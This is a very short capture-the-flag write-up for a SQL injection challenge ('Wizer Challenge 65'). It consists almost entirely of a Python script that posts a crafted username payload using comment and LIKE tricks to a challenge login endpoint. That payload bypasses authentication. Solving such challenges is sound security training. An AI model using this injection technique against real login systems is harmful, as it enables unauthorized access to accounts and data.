Wizer - Challenge 65 - SQLi
I got the first blood on this challenge!
Exploit
import requests
url = "https://chal53-jhsdfs2.vercel.app/login"
uuid = "6d8998d3-db70-4f82-84c0-4a461c383847"
r = requests.post(url, json={
"username": "'/**/LIKE'%"
})
print(r.text)